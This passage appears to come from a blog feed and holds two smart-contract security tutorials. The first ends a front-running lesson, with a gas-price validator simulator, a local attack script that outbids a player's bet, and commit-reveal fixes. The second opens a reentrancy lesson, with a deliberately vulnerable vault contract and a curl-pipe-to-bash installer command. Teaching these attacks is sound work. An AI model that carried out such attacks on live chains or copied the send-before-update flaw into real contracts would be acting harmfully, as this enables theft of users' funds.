In addition to Anvil and Cast, we will use a **custom validator**—a script we developed to simulate the role of a real blockchain validator. This validator:

-   Monitors the pending transaction pool (mempool).
-   Prioritizes transactions based on gas prices.
-   Simulates mining behavior by selecting high-priority transactions for inclusion in blocks.

## Simulating the Validator for Front-Running

Now that we&apos;ve explored the BiomechanicalRace contract and the concept of front-running vulnerabilities, it’s time to introduce another layer to our simulation: a custom validator. This component helps us mimic real-world blockchain behavior where validators select and process transactions based on specific criteria, such as gas prices.

#### Understanding Validators

Validators are the backbone of blockchain networks. Their role is to verify transactions, bundle them into blocks, and append these blocks to the blockchain. In Ethereum, validators (or miners, in the case of Proof-of-Work) typically prioritize transactions with higher gas fees because these offer greater rewards. This behavior creates an opportunity for front-runners to exploit the mempool, submitting transactions with higher fees to get ahead in the queue.

In our simulation, we’ll use a **custom-built validator script** to recreate this decision-making process. The validator will:

1.  **Monitor the Mempool:** Listen for pending transactions.
2.  **Prioritize Transactions:** Sort transactions by gas price to simulate real-world prioritization.
3.  **Simulate Mining:** Include the highest-priority transactions in a block.

**Prerequisites**

To use the validator, ensure the following are installed:

-   **Node.js:** The runtime for executing the validator script.
-   **ethers.js:** A library for Ethereum blockchain interactions.
-   **axios:** An HTTP client for sending RPC requests to Anvil.

&lt;details&gt;
&lt;summary&gt;Install the necessary dependencies with the following command:&lt;/summary&gt;

```bash
npm install ethers axios

```
&lt;/details&gt;


For a smooth development experience, install `nodemon`, a utility that automatically restarts the script when changes are made:

```bash
npm install -g nodemon

```

**The Validator Script**

Below is the custom validator script. Save it as `validator.js`:

&lt;details&gt;
&lt;summary&gt;Validator Script&lt;/summary&gt;

```js
const { ethers } = require(&quot;ethers&quot;);
const axios = require(&quot;axios&quot;);

// Connect to Anvil
const provider = new ethers.JsonRpcProvider(&quot;http://localhost:8545&quot;);

console.log(&quot;Validator connected to Anvil&quot;);

// List to store pending transactions
let pendingTransactions = [];

// Listen for pending transactions
provider.on(&quot;pending&quot;, async (txHash) =&gt; {
  try {
    const tx = await provider.getTransaction(txHash);

    if (tx) {
      console.log(&quot;\nTransaction detected:&quot;);
      console.log(`  Hash: ${tx.hash}`);
      console.log(`  From: ${tx.from}`);
      console.log(`  To: ${tx.to || &quot;Contract Deployment&quot;}`);
      console.log(`  Value: ${ethers.formatEther(tx.value)} ETH`);

      const gasPrice = tx.gasPrice || tx.maxFeePerGas; // Handle different transaction types
      console.log(`  Gas Price: ${ethers.formatUnits(gasPrice, &quot;gwei&quot;)} gwei`);

      // Add to local mempool
      pendingTransactions.push(tx);
      console.log(&quot;Transaction added to local mempool.&quot;);
    }
  } catch (error) {
    console.error(`Error processing transaction ${txHash}:`, error);
  }
});

// Simulate block mining every 10 seconds
setInterval(async () =&gt; {
  if (pendingTransactions.length &gt; 0) {
    console.log(&quot;\nMining a new block...&quot;);

    // Sort transactions by gas price (descending order)
    pendingTransactions.sort((a, b) =&gt; {
      const gasA = a.maxFeePerGas || a.gasPrice;
      const gasB = b.maxFeePerGas || b.gasPrice;
      // ethers v6 returns native bigints, so compare with &gt; rather than .gt()
      return gasB &gt; gasA ? 1 : -1; // Prioritize higher gas
    });

    const selectedTx = pendingTransactions.shift(); // Select the highest-priority transaction

    try {
      console.log(&quot;Selected transaction for mining:&quot;, selectedTx.hash);

      // Simulate block mining using Anvil&apos;s RPC. Note that evm_mine
      // includes *all* currently pending transactions; the shift() above
      // models the validator&apos;s selection, it does not limit what Anvil mines.
      await axios.post(&quot;http://localhost:8545&quot;, {
        jsonrpc: &quot;2.0&quot;,
        method: &quot;evm_mine&quot;,
        params: [],
        id: 1,
      });

      console.log(&quot;Transaction mined in new block:&quot;, selectedTx.hash);
    } catch (error) {
      console.error(&quot;Error mining transaction:&quot;, error.message);
    }
  }
}, 10000); // Attempt to mine every 10 seconds

// Listen for new blocks
provider.on(&quot;block&quot;, (blockNumber) =&gt; {
  console.log(`\nNew block mined: ${blockNumber}`);
});

```
&lt;/details&gt;


**What the Validator Does**

-   **Transaction Monitoring:** The validator continuously listens for pending transactions and logs their details (e.g., sender, recipient, value, and gas price).
-   **Transaction Sorting:** Transactions are sorted by gas price, prioritizing those with higher fees.
-   **Block Mining Simulation:** The validator uses Anvil’s `evm_mine` RPC method to simulate block mining, ensuring prioritized transactions are processed first.

## Explaining the Attack Simulation Script

The script is designed to simulate a front-running attack on the **BiomechanicalRace** contract, leveraging the transparency of the blockchain and transaction prioritization based on gas fees. Below, we’ll break down the script step by step, explaining each part and its role in the simulation.

&lt;details&gt;
&lt;summary&gt;The attack Simulation Script&lt;/summary&gt;

```bash
#!/bin/bash

# Force English number formatting (dot as the decimal separator)
export LC_NUMERIC=&quot;en_US.UTF-8&quot;

# Set up variables
RPC_URL=&quot;http://localhost:8545&quot;
ADMIN_PK=&quot;0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80&quot;
PLAYER_PK=&quot;0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d&quot;
ATTACKER_PK=&quot;0x5de4111afa1a4b94908f83103eb1f1706367c2e68ca870fc3fb9a804cdab365a&quot;
CONTRACT_NAME=&quot;BiomechanicalRace&quot;
CONTRACT_PATH=&quot;src/BiomechanicalRace.sol:$CONTRACT_NAME&quot;

# Deploy contract using forge
echo &quot;Deploying contract using forge...&quot;
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --private-key $ADMIN_PK \
                             --rpc-url $RPC_URL | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)
echo &quot;Contract deployed at: $CONTRACT_ADDRESS&quot;

# Fund contract with 20 ETH
echo &quot;Funding contract with 20 ETH...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ADMIN_PK \
          --value 20ether
echo &quot;Contract funded.&quot;

# Player places a bet (in background)
echo &quot;Player placing a bet...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          --value 3ether \
          --gas-price 70000000000 \
          &quot;placeBet(uint256)&quot; 1 &amp;
player_pid=$!

# Attacker places a front-running bet with higher gas price (in background)
echo &quot;Attacker placing a front-running bet...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          --value 3ether \
          --gas-price 80000000000 \
          &quot;placeBet(uint256)&quot; 1 &amp;
attacker_pid=$!

# Wait for both transactions to complete
wait $player_pid
wait $attacker_pid

echo &quot;Both bets placed.&quot;

# End the race and declare a winner
echo &quot;Ending the race...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ADMIN_PK \
          &quot;endRace(uint256)&quot; 1
echo &quot;Race ended. Winner declared.&quot;

# Player claims winnings
echo &quot;Player claiming winnings...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          &quot;claimWinnings()&quot;
echo &quot;Player winnings claimed.&quot;

# Attacker claims winnings
echo &quot;Attacker claiming winnings...&quot;
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          &quot;claimWinnings()&quot;
echo &quot;Attacker winnings claimed.&quot;

# Display final balances
echo &quot;Final balances:&quot;
admin_balance=$(cast balance 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 --rpc-url $RPC_URL)
player_balance=$(cast balance 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 --rpc-url $RPC_URL)
attacker_balance=$(cast balance 0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC --rpc-url $RPC_URL)

# Convert balances to ETH
admin_eth=$(awk &quot;BEGIN {print $admin_balance / 10^18}&quot;)
player_eth=$(awk &quot;BEGIN {print $player_balance / 10^18}&quot;)
attacker_eth=$(awk &quot;BEGIN {print $attacker_balance / 10^18}&quot;)

# Round to 4 decimal places
admin_eth=$(printf &quot;%.4f&quot; $admin_eth)
player_eth=$(printf &quot;%.4f&quot; $player_eth)
attacker_eth=$(printf &quot;%.4f&quot; $attacker_eth)

echo &quot;Admin: $admin_eth ETH&quot;
echo &quot;Player: $player_eth ETH&quot;
echo &quot;Attacker: $attacker_eth ETH&quot;

```
&lt;/details&gt;


#### **Step 1: Deploying the Contract**

The script starts by deploying the smart contract to the Anvil blockchain. This sets up the environment with the vulnerable contract.

```bash
CONTRACT_ADDRESS=$(forge create $CONTRACT_PATH \
                             --private-key $ADMIN_PK \
                             --rpc-url $RPC_URL | grep &quot;Deployed to&quot; | awk &apos;{print $NF}&apos;)
echo &quot;Contract deployed at: $CONTRACT_ADDRESS&quot;

```

Here, the contract is deployed using `forge create`, and its address is captured into the variable `CONTRACT_ADDRESS` for further interactions.

#### **Step 2: Funding the Contract**

The next step is to fund the contract with 20 ETH to ensure it can pay rewards after the race concludes.

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ADMIN_PK \
          --value 20ether
echo &quot;Contract funded.&quot;

```

This transaction sends 20 ETH from the admin account to the deployed contract.

#### **Step 3: Placing Bets**

The script simulates a legitimate player placing a bet. This transaction is sent in the background. Simultaneously, the attacker places a front-running bet with a higher gas price to ensure their transaction is prioritized.

Player’s bet:

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          --value 3ether \
          --gas-price 70000000000 \
          &quot;placeBet(uint256)&quot; 1 &amp;
player_pid=$!

```

Attacker’s bet:

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          --value 3ether \
          --gas-price 80000000000 \
          &quot;placeBet(uint256)&quot; 1 &amp;
attacker_pid=$!

```

Both transactions are sent concurrently using the `&amp;` operator, and the script waits for them to complete with the following:

```bash
wait $player_pid
wait $attacker_pid

```

This setup creates a realistic scenario where the attacker exploits the higher gas fee to front-run the player’s bet.

#### **Step 4: Ending the Race**

The admin concludes the race by declaring a winner. This triggers the contract’s logic to calculate rewards for participants.

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ADMIN_PK \
          &quot;endRace(uint256)&quot; 1
echo &quot;Race ended. Winner declared.&quot;

```

#### **Step 5: Claiming Winnings**

Both the player and the attacker claim their winnings after the race ends. The attacker’s front-running bet ensures they receive a disproportionately higher reward.

&lt;details&gt;
&lt;summary&gt;Player claiming winnings:&lt;/summary&gt;

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $PLAYER_PK \
          &quot;claimWinnings()&quot;
echo &quot;Player winnings claimed.&quot;

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Attacker claiming winnings:&lt;/summary&gt;

```bash
cast send $CONTRACT_ADDRESS \
          --rpc-url $RPC_URL \
          --private-key $ATTACKER_PK \
          &quot;claimWinnings()&quot;
echo &quot;Attacker winnings claimed.&quot;

```
&lt;/details&gt;


#### **Step 6: Displaying Final Balances**

The script retrieves and displays the final balances of the admin, player, and attacker. The balances are converted from wei to ETH for readability.

&lt;details&gt;
&lt;summary&gt;Fetching balances:&lt;/summary&gt;

```bash
admin_balance=$(cast balance 0xf39Fd6e51aad88F6F4ce6aB8827279cffFb92266 --rpc-url $RPC_URL)
player_balance=$(cast balance 0x70997970C51812dc3A010C7d01b50e0d17dc79C8 --rpc-url $RPC_URL)
attacker_balance=$(cast balance 0x3C44CdDdB6a900fa2b585dd299e03d12FA4293BC --rpc-url $RPC_URL)

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Converting to ETH:&lt;/summary&gt;

```bash
admin_eth=$(awk &quot;BEGIN {print $admin_balance / 10^18}&quot;)
player_eth=$(awk &quot;BEGIN {print $player_balance / 10^18}&quot;)
attacker_eth=$(awk &quot;BEGIN {print $attacker_balance / 10^18}&quot;)

```
&lt;/details&gt;


&lt;details&gt;
&lt;summary&gt;Formatting for output:&lt;/summary&gt;

```bash
echo &quot;Admin: $admin_eth ETH&quot;
echo &quot;Player: $player_eth ETH&quot;
echo &quot;Attacker: $attacker_eth ETH&quot;

```
&lt;/details&gt;


## Executing the Complete Simulation

Now that we’ve set up the necessary tools and scripts, let’s execute the simulation from start to finish. This includes running Anvil with a custom block mining time, executing our attack script, and analyzing the results to understand how gas price manipulation influences the outcome of the front-running attack.

#### **Step 1: Launching Anvil with a Block Time**

To give our custom validator time to prioritize and mine transactions before Anvil processes them automatically, we’ll start Anvil with a block time of 20 seconds. Since the validator attempts to mine every 10 seconds, its `evm_mine` calls fire before Anvil’s automatic block, so transaction ordering is driven by our script rather than Anvil’s default behavior.

&lt;details&gt;
&lt;summary&gt;Run the following command to start Anvil:&lt;/summary&gt;

```bash
anvil --block-time 20

```
&lt;/details&gt;
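The two intervals give the validator a comfortable margin; a quick check of how many mining attempts it gets per automatic Anvil block:

```bash
anvil_block_time=20    # seconds between Anvil&apos;s automatic blocks
validator_interval=10  # seconds between the validator&apos;s evm_mine attempts

# Mining attempts our validator gets per automatic Anvil block
attempts=$((anvil_block_time / validator_interval))
echo &quot;$attempts&quot;  # 2
```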


#### **Step 2: Starting the Validator**

With Anvil running, the next step is to start our custom validator. The validator monitors the mempool for incoming transactions, prioritizes them based on gas prices, and simulates block mining. This ensures that transactions with higher gas prices are processed first.

&lt;details&gt;
&lt;summary&gt;Run the following command to start the validator:&lt;/summary&gt;

```bash
nodemon validator.js

```
&lt;/details&gt;


![](/content/images/2024/12/image-1.png)

Validator&apos;s logs

#### **Step 3: Running the Attack Script**

With Anvil and the validator running, execute the attack simulation script. This script deploys the **BiomechanicalRace** contract, funds it, simulates the player’s and attacker’s bets, ends the race, and displays the final balances.

&lt;details&gt;
&lt;summary&gt;Run the script:&lt;/summary&gt;

```bash
bash simulate-attack.sh

```
&lt;/details&gt;


![](/content/images/2024/12/image.png)

Running the attack

#### **Step 4: Observing the Effect of Gas Prices**

The simulation clearly demonstrates how gas price manipulation impacts transaction prioritization. When the attacker sets a higher gas price (e.g., 80 gwei) compared to the player&apos;s lower gas price (e.g., 70 gwei), the validator prioritizes the attacker’s transaction, allowing it to be processed first. This gives the attacker access to a more favorable multiplier under the **BiomechanicalRace** contract, maximizing their rewards.

In contrast, when the player uses a higher gas price, their transaction gets processed first, shifting the advantage in their favor. The following results showcase the outcomes in both scenarios:

-   **Attacker Prioritization (Higher Gas)**: The attacker receives disproportionately larger rewards due to their transaction being mined first.
-   **Player Prioritization (Higher Gas)**: The player secures better winnings, showcasing how gas price effectively alters transaction order and payout structure.

![](/content/images/2024/12/image-2.png)

Result when the attacker uses a higher gas price than the player

![](/content/images/2024/12/image-3.png)

The opposite case: the player pays the higher gas price

The differences in the final ETH balances underscore the significant influence of gas price on transaction order and outcomes, reinforcing how open and transparent mempool systems can be exploited without proper safeguards.

# Making the Contract Secure

One effective strategy to mitigate front-running is the **commit-reveal scheme**. In this approach, bettors first submit a hashed version of their bet during a commit phase, concealing the details of their transaction. Later, in a reveal phase, the bettor discloses the actual bet details along with the corresponding hash. This ensures that no one, including potential attackers, can discern the contents of a bet until it is revealed. For example, in the BiomechanicalRace contract, this would involve storing the hash of the bet during the commit phase:

```solidity
mapping(address =&gt; bytes32) public commitHashes;
bool public commitPhase;

function commitBet(bytes32 hash) external {
    require(commitPhase, &quot;Commit phase is not active&quot;);
    commitHashes[msg.sender] = hash;
}

```

Once the commit phase ends, users can reveal their bets by submitting the details along with the original hash:

```solidity
function revealBet(uint256 creatureId, uint256 amount, bytes32 salt) external payable {
    require(!commitPhase, &quot;Reveal phase is not active&quot;);
    // Ensure the ETH sent actually matches the revealed bet amount
    require(msg.value == amount, &quot;Incorrect ETH amount&quot;);
    require(commitHashes[msg.sender] == keccak256(abi.encodePacked(creatureId, amount, salt)), &quot;Invalid reveal&quot;);

    creatures[creatureId].totalBets += amount;
    bets[msg.sender][creatureId] += amount;
    totalBets += amount;
}

```

This method ensures that bet details are obscured during submission, mitigating the risk of front-running.

Another layer of protection can be added through **randomized bet processing**. By processing bets in a non-deterministic order, attackers cannot reliably predict which bets will be prioritized. In the BiomechanicalRace contract, bets could be shuffled based on a pseudo-random value derived from block data; keep in mind that block-derived values can be influenced by the block producer, so this raises the bar rather than eliminating the risk:

```solidity
function processBetsRandomly() external {
    // block.prevrandao replaced the deprecated block.difficulty in Solidity 0.8.18+
    uint256 randomIndex = uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao))) % participants.length;
    address randomParticipant = participants[randomIndex];
    uint256 betAmount = bets[randomParticipant][1]; // Example for creature ID 1
    creatures[1].totalBets += betAmount;
    delete bets[randomParticipant][1];
}

```

For scenarios requiring enhanced privacy, incorporating **off-chain signing** can be valuable. With this approach, users generate and sign their bet data off-chain, and the contract verifies the signature on-chain. Note that a signature alone does not hide the calldata once the transaction is broadcast; in practice this pattern is combined with a relayer or private mempool that submits the signed bets, keeping them out of the public mempool until processing. In the BiomechanicalRace contract, the on-chain verification could look like:

```solidity
function placeSignedBet(
    uint256 creatureId,
    uint256 amount,
    bytes32 salt,
    bytes memory signature
) external payable {
    require(msg.value == amount, &quot;Incorrect ETH amount&quot;);
    bytes32 message = keccak256(abi.encodePacked(creatureId, amount, salt, address(this)));
    // recoverSigner is a helper that applies the EIP-191 prefix and calls
    // ecrecover (e.g. OpenZeppelin&apos;s ECDSA.recover)
    require(recoverSigner(message, signature) == msg.sender, &quot;Invalid signature&quot;);

    creatures[creatureId].totalBets += amount;
    totalBets += amount;
}

```

Additionally, implementing **time-locks** ensures that transactions are processed in batches within a set time frame, reducing the advantage of being the first to submit a transaction. The BiomechanicalRace contract could integrate time-locks to group bets:

```solidity
uint256 public batchStartTime;
uint256 public batchDuration = 10 minutes;

function startBatch() external {
    // In production this should be access-controlled (e.g. onlyOwner),
    // otherwise anyone could reset the batch window at will
    batchStartTime = block.timestamp;
}

function processBatchBets() external {
    require(block.timestamp &gt;= batchStartTime + batchDuration, &quot;Batch time not elapsed&quot;);
    // Process all bets placed during the batch
}

```
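The gating condition the contract enforces can be modelled in the shell; a bet submitted inside the window is held until the batch duration has elapsed:

```bash
batch_start=$(date +%s)
batch_duration=600  # 10 minutes, mirroring batchDuration in the contract

now=$(date +%s)
elapsed=$((now - batch_start))

# Same check as the require() in processBatchBets
if [ &quot;$elapsed&quot; -ge &quot;$batch_duration&quot; ]; then
  echo &apos;processing batch&apos;
else
  echo &apos;batch time not elapsed&apos;
fi
```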

# Conclusions

Front-running vulnerabilities highlight the tension between transparency and security in blockchain systems. Using the **BiomechanicalRace** contract, we demonstrated how attackers exploit transaction visibility to gain an unfair advantage, leveraging tools like **Anvil**, **Cast**, and a custom validator to simulate and analyze the attack in detail. This process reinforced the need for robust smart contract design to mitigate such risks.

#### Key Takeaways:

1.  **Understanding Vulnerabilities**: Front-running is not a flaw in blockchain technology but a byproduct of its transparency, emphasizing the need for secure transaction ordering mechanisms.
2.  **Practical Demonstration**: By simulating attacks, we gained insight into how malicious actors exploit mempool visibility and the importance of prioritizing preventive measures.
3.  **Mitigation Strategies**: Approaches like **commit-reveal schemes** or **off-chain signing** can effectively address vulnerabilities, though they require balancing usability and security.

This exploration underscores the importance of comprehensive testing and innovative design strategies to build secure and trustworthy blockchain applications.

# References

-   Foundry - A Blazing Fast, Modular, and Portable Ethereum Development Framework. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/](https://book.getfoundry.sh/)
-   Solidity - Language for Smart Contract Development. &quot;Solidity Documentation.&quot; Available at: [https://docs.soliditylang.org/](https://docs.soliditylang.org/)
-   OpenZeppelin - Secure Smart Contract Libraries. &quot;OpenZeppelin Contracts Documentation.&quot; Available at: [https://docs.openzeppelin.com/contracts](https://docs.openzeppelin.com/contracts)
-   Ethereum - Open-Source Blockchain Platform for Smart Contracts. &quot;Ethereum Whitepaper.&quot; Available at: [https://ethereum.org/en/whitepaper/](https://ethereum.org/en/whitepaper/)
-   Testing Ethereum Smart Contracts - Best Practices with Foundry. &quot;Foundry Documentation.&quot; Available at: [https://book.getfoundry.sh/tutorials/testing](https://book.getfoundry.sh/tutorials/testing)
-   Ethereum Validators - An Overview of Ethereum Validators and Their Role. &quot;Ethereum Staking Documentation.&quot; Available at: https://ethereum.org/en/developers/docs/guides/staking/
-   Gas Price Mechanics - Understanding Gas and Transaction Fees in Ethereum. &quot;Ethereum Documentation.&quot; Available at: https://ethereum.org/en/developers/docs/gas/
-   Front-Running in DeFi - Risks and Mitigation Strategies. &quot;Chainlink Blog.&quot; Available at: https://blog.chain.link/front-running-defi/</content:encoded><author>Ruben Santos</author></item><item><title>The Traitor Within: Reentrancy Attacks Explained and Resolved</title><link>https://www.kayssel.com/post/web3-4</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-4</guid><description>This chapter explores reentrancy attacks in Ethereum, showcasing vulnerabilities in smart contracts and how they can be exploited using Foundry for testing. We demonstrate the attack strategy, implement a fix to secure the contract, and emphasize best practices for robust Solidity development.</description><pubDate>Sun, 24 Nov 2024 15:10:17 GMT</pubDate><content:encoded># Introduction

Reentrancy attacks are among the most notorious vulnerabilities in the Web3 space, often leading to catastrophic losses of funds in smart contracts. These attacks exploit the logic of a contract by recursively calling functions before previous operations complete, effectively manipulating balances and draining Ether. This chapter focuses on understanding, testing, and automating the detection of such vulnerabilities using **Foundry**, a powerful Solidity development framework.

#### What You&apos;ll Learn in This Chapter

1.  **Understanding Reentrancy Attacks**: We&apos;ll revisit what reentrancy is, including its mechanics and the devastating consequences it can have when left unaddressed. This includes a deep dive into fallback and `receive` functions, which are often instrumental in enabling such attacks.
2.  **The Vulnerable Contract**: We’ll analyze a fictional contract, `PiratesGuildVault`, which contains a subtle yet critical vulnerability. You&apos;ll learn to dissect its logic and understand why its implementation is prone to reentrancy.
3.  **The Malicious Contract**: Next, we’ll introduce the attacker&apos;s contract, `TheTraitorWithin`, specifically designed to exploit the vulnerable vault. This contract mimics real-world malicious strategies used in reentrancy attacks.
4.  **Automated Testing with Foundry**: Testing is the cornerstone of secure smart contract development. In this section, you’ll learn how to simulate a reentrancy attack using Foundry, automate the testing process, and analyze the results.
5.  **Common Pitfalls and Fixes**: After observing the test failures, we’ll discuss the root cause of these issues, including why the attack leads to exceptions when the vault is empty. You’ll see how edge-case handling, while important for testing, doesn&apos;t address the vulnerability itself but helps the tests run seamlessly.
6.  **Key Takeaways for Developers**:
    -   Always update internal balances **before** transferring Ether.
    -   Beware of unexpected recursion through fallback or `receive` functions.
    -   Automate your tests to catch subtle vulnerabilities like reentrancy early in development.

By the end of this chapter, you’ll not only understand how reentrancy works but also how to build robust testing frameworks that can expose such vulnerabilities. This practical, hands-on approach will leave you better equipped to write secure smart contracts and mitigate one of the most significant threats in Web3 development.

# **What is the Reentrancy Vulnerability in Web3?**

Reentrancy is one of the most notorious vulnerabilities in smart contract development, particularly on Ethereum and other blockchains using the Ethereum Virtual Machine (EVM). This vulnerability enables an attacker to exploit a contract by repeatedly calling back into it before the previous execution is complete, often resulting in unexpected behavior or, worse, the draining of funds.

## **How Does Reentrancy Work?**

At its core, the reentrancy vulnerability occurs when a contract transfers Ether to another address before fully updating its internal state. This allows the recipient, typically a malicious contract, to execute its own logic and re-enter the original contract&apos;s function, disrupting its intended flow.

## **Step-by-Step Breakdown of a Reentrancy Attack:**

1.  **The vulnerable contract (`VulnerableContract`) allows Ether withdrawals.** A user can deposit Ether into the contract, and they can later withdraw their balance using a `withdraw` function.
2.  **The attacker deploys a malicious contract (`MaliciousContract`).** This contract is designed to exploit `VulnerableContract` by repeatedly calling the `withdraw` function before it finishes executing.
3.  **The attack begins.** The attacker calls `withdraw` on `VulnerableContract`. Instead of simply transferring Ether and completing the transaction, the `MaliciousContract` executes its `fallback` or `receive` function to re-enter `withdraw`.
4.  **Funds are drained.** Because `VulnerableContract` hasn’t yet updated the attacker’s balance, the same withdrawal process can happen repeatedly until the contract’s Ether balance is depleted.

## **What is a Fallback Function?**

In Solidity, the fallback function is a special function, declared as `fallback()` without the `function` keyword, that gets triggered when:

-   A contract receives Ether but doesn’t have a `receive` function.
-   A function call doesn’t match any existing function in the contract.

The fallback function acts as a catch-all and allows contracts to handle unexpected Ether transfers or unknown function calls. In the context of reentrancy, fallback functions are often used in malicious contracts to re-enter the vulnerable contract.

```solidity
// A simple contract with a fallback function
contract Example {
    fallback() external payable {
        // Logic to handle unexpected calls or Ether transfers
    }
}

```

### **How is `receive` Different from `fallback`?**

-   **`receive`:** Introduced in Solidity 0.6.0, it’s triggered when a contract receives plain Ether (no calldata).
-   **`fallback`:** Triggered when a function call doesn’t match any existing function, or when Ether is sent with calldata but no matching function exists.

If a contract has both `receive` and `fallback`, the `receive` function is prioritized when Ether is sent without calldata.

# **Switching Gears: Exploring Reentrancy with Foundry**

In this section, we’ll take a step away from the tools we’ve been using, such as Hardhat, and introduce a powerful alternative: **Foundry**. Foundry is a robust Ethereum development framework that’s gaining popularity due to its speed, simplicity, and focus on Solidity-based testing. As its usage continues to grow, it’s becoming increasingly valuable from an offensive security perspective to understand how it works. It offers an excellent environment for analyzing and experimenting with vulnerabilities like reentrancy, making it a must-know tool for security enthusiasts and professionals alike.

## **Installing Foundry**

Foundry provides a command-line tool called `forge`, which is at the core of the framework. Installing Foundry is straightforward and works on most systems.

1.  **Install Foundryup**: Foundryup is the installer and version manager for Foundry. To install it, open your terminal and run the following command:

```bash
curl -L https://foundry.paradigm.xyz | bash

```

Once installed, you&apos;ll need to source your shell configuration to add `foundryup` to your PATH:

```bash
source ~/.bashrc    # or ~/.zshrc, depending on your shell

```

2.  **Install Foundry**: After Foundryup is installed, you can install Foundry by running:

```bash
foundryup

```

This will install `forge` (the testing and compilation tool) and `cast` (a utility tool for Ethereum interactions).

3.  **Verify Installation**: Check that Foundry is installed by running:

```bash
forge --version

```

You should see the installed version of Forge.

## **Setting Up Your Project**

Now that Foundry is installed, let&apos;s create a new project where we&apos;ll build and test our contracts.

1.  **Initialize a Foundry Project:** Use the following command to create a new project:

```bash
forge init BountyVault

```

This will create a directory named `BountyVault` with a default folder structure (recent Foundry versions also generate `script/` and `lib/` directories, omitted here):

```bash
BountyVault/
├── src/
│   └── Counter.sol    # Default contract
├── test/
│   └── Counter.t.sol  # Default test file
├── foundry.toml       # Configuration file

```

2.  **Project Structure**: Update your `src/` and `test/` folders with your own contracts and tests. For our reentrancy example:

```bash
BountyVault/
├── src/
│   ├── PiratesGuildVault.sol
│   ├── TheTraitorWithin.sol
├── test/
│   └── ReentrancyExploit.t.sol
├── foundry.toml

```

3.  **Compile Contracts**: Compile your contracts using:

```bash
forge build

```

# **Explaining the Pirate&apos;s Guild Vault Contract**

The **Pirate&apos;s Guild Vault** is a Solidity smart contract that serves as a shared repository for Ether, accessible only by registered members of a fictional pirate guild. Its design revolves around three main functionalities: joining the guild, depositing treasure, and withdrawing funds. Let’s walk through its core structure and functionality, with code snippets to highlight key sections.

&lt;details&gt;
&lt;summary&gt;Vulnerable Contract&lt;/summary&gt;

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/**
 * @title Pirate&apos;s Guild Vault
 * @notice A shared vault for members of the pirate guild to store and withdraw their treasures.
 */
contract PiratesGuildVault {
    struct Member {
        uint256 balance;
        bool isMember;
    }

    mapping(address =&gt; Member) private guildMembers;
    uint256 public totalVaultBalance;

    modifier onlyMembers() {
        require(
            guildMembers[msg.sender].isMember,
            &quot;Only guild members can access the vault!&quot;
        );
        _;
    }

    /**
     * @dev Join the guild by becoming a member.
     */
    function joinGuild() external {
        require(
            !guildMembers[msg.sender].isMember,
            &quot;You are already a member of the guild!&quot;
        );

        guildMembers[msg.sender] = Member({balance: 0, isMember: true});
    }

    /**
     * @dev Deposit Ether into the guild&apos;s shared vault.
     */
    function deposit() external payable onlyMembers {
        require(msg.value &gt; 0, &quot;You must deposit some treasure!&quot;);

        guildMembers[msg.sender].balance += msg.value;
        totalVaultBalance += msg.value;
    }

    /**
     * @dev Withdraw Ether from your guild account.
     */
    function withdraw(uint256 amount) external onlyMembers {
        Member storage member = guildMembers[msg.sender];
        require(amount &gt; 0, &quot;Withdrawal amount must be greater than zero!&quot;);
        require(
            member.balance &gt;= amount,
            &quot;Not enough balance in your treasure account!&quot;
        );

        // Vulnerability: Ether is sent before the balance is updated
        (bool success, ) = msg.sender.call{value: amount}(&quot;&quot;);
        require(success, &quot;Failed to send Ether!&quot;);
        member.balance -= amount;
        totalVaultBalance -= amount;
        
    }

    /**
     * @dev Fallback function to accept Ether.
     */
    receive() external payable {
        totalVaultBalance += msg.value;
    }
}

```
&lt;/details&gt;


At its foundation, the contract uses a `struct` called `Member` to represent individual guild members. Each `Member` has two attributes: their Ether balance and their membership status. This data is stored in a `mapping` that links Ethereum addresses to `Member` records. Additionally, the contract tracks the total Ether stored in the vault through the `totalVaultBalance` variable.

```solidity
struct Member {
    uint256 balance;
    bool isMember;
}

mapping(address =&gt; Member) private guildMembers;
uint256 public totalVaultBalance;

```

To enforce guild exclusivity, a custom `onlyMembers` modifier is introduced. This modifier ensures that only registered guild members can execute certain functions. If a non-member attempts to access these functions, the contract will revert with an error message.

```solidity
modifier onlyMembers() {
    require(
        guildMembers[msg.sender].isMember,
        &quot;Only guild members can access the vault!&quot;
    );
    _;
}

```

Membership is managed through the `joinGuild` function. This function allows an address to register as a guild member, provided it is not already a member. Once added, the address is initialized with a balance of zero and is marked as a member.

```solidity
function joinGuild() external {
    require(
        !guildMembers[msg.sender].isMember,
        &quot;You are already a member of the guild!&quot;
    );

    guildMembers[msg.sender] = Member({balance: 0, isMember: true});
}

```

